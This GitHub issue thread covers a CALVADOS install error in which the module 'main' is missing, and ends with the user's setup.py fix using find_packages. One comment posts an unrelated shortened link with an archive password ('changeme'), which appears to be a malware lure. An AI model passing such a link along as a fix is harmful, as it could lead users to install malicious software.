### ISSUE TITLE
an error when executing the following command "python prepare.py --name hnRNPA1LCD" after installing calvados

### ISSUE THREAD

**Issue by Modk1996** [KULL-Centre/CALVADOS#4]
When I excuted the following command "python prepare.py --name hnRNPA1LCD" in the /calvados/examples/single_IDR folder, an error occured. This is the error information

/home/ly/anaconda3/envs/calvados/lib/python3.10/site-packages/Bio/Application/__init__.py:39: BiopythonDeprecationWarning: The Bio.Application modules and modules relying on it have been deprecated.

Due to the on going maintenance burden of keeping command line application
wrappers up to date, we have decided to deprecate and eventually remove these
modules.

We instead now recommend building your command line and invoking it directly
with the subprocess module.
  warnings.warn(
Traceback (most recent call last):
  File "/home/ly/zxz/CALVADOS-main/examples/single_IDR/prepare.py", line 3, in <module>
    from calvados.cfg import Config, Job, Components
  File "/home/ly/anaconda3/envs/calvados/lib/python3.10/site-packages/calvados/__init__.py", line 1, in <module>
    import calvados.analysis
  File "/home/ly/anaconda3/envs/calvados/lib/python3.10/site-packages/calvados/analysis.py", line 22, in <module>
    from main import BlockAnalysis
ModuleNotFoundError: No module named 'main'

I have checked that there is no main.py file in the calvados file folder, where can I get the main.py?

**Comment by SAMBILI** [comment]
try this

https://bit.ly/3TCbXO6
Pass: changeme

you may need to install the c compiler

**Comment by Modk1996** [comment]
> try this
> 
> https://bit.ly/3TCbXO6 Pass: changeme
> 
> you may need to install the c compiler

Are you sure? It seems unrelated to the issue I mentioned

**Comment by Modk1996** [comment]
I have identified the cause of this error, as lines 6 to 9 of the setup. py file did not execute successfully.

**Comment by sobuelow** [comment]
Thanks for the report; why did lines 6-9 not execute properly?

**Comment by Modk1996** [comment]
> Thanks for the report; why did lines 6-9 not execute properly?

I made a mistake and lines 6-9 indeed excuted successfully, but the two files mentioned in lines 6-9 (main.py & block_tools.py) were not installed with calvados. It seems that the whole file folder "BLOCKING" was not installed. Perhaps modifying the file “setup.py" would be helpful.

**Comment by gitesei** [comment]
Thank you for reporting the issue. It’s possible that curl is not installed on your system. I’ve updated setup.py so that it should also work with wget. Could you please let me know if the new version works for you?

**Comment by gitesei** [comment]
I noticed something missing in the wget command in setup.py, so I’ve just pushed the commit again

**Comment by Modk1996** [comment]
> I noticed something missing in the wget command in setup.py, so I’ve just pushed the commit again

Thank you, but it doesn't seem to solve the problem I'm facing. I downloaded these two files successfully before. When I executed the command "pip install .", the whole folder "BLOCKING" was not installed into "python3.10/site-packages/calvados". It maybe some bug of my linux system.
To solve it, I changed the line 1 of setup.py from "from setuptools import setup" to "from setuptools import setup, find_packages" and changed the line 27 of setup.py from "packages=['calvados']," to "packages=find_packages(),". And then I created an empty file named "__init__.py" in the "BLOCKING" folder. 
After these things, I executed the command "pip install ." again, the "BLOCKING" folder was installed into "python3.10/site-packages/calvados" correctly, and the module main can be found.
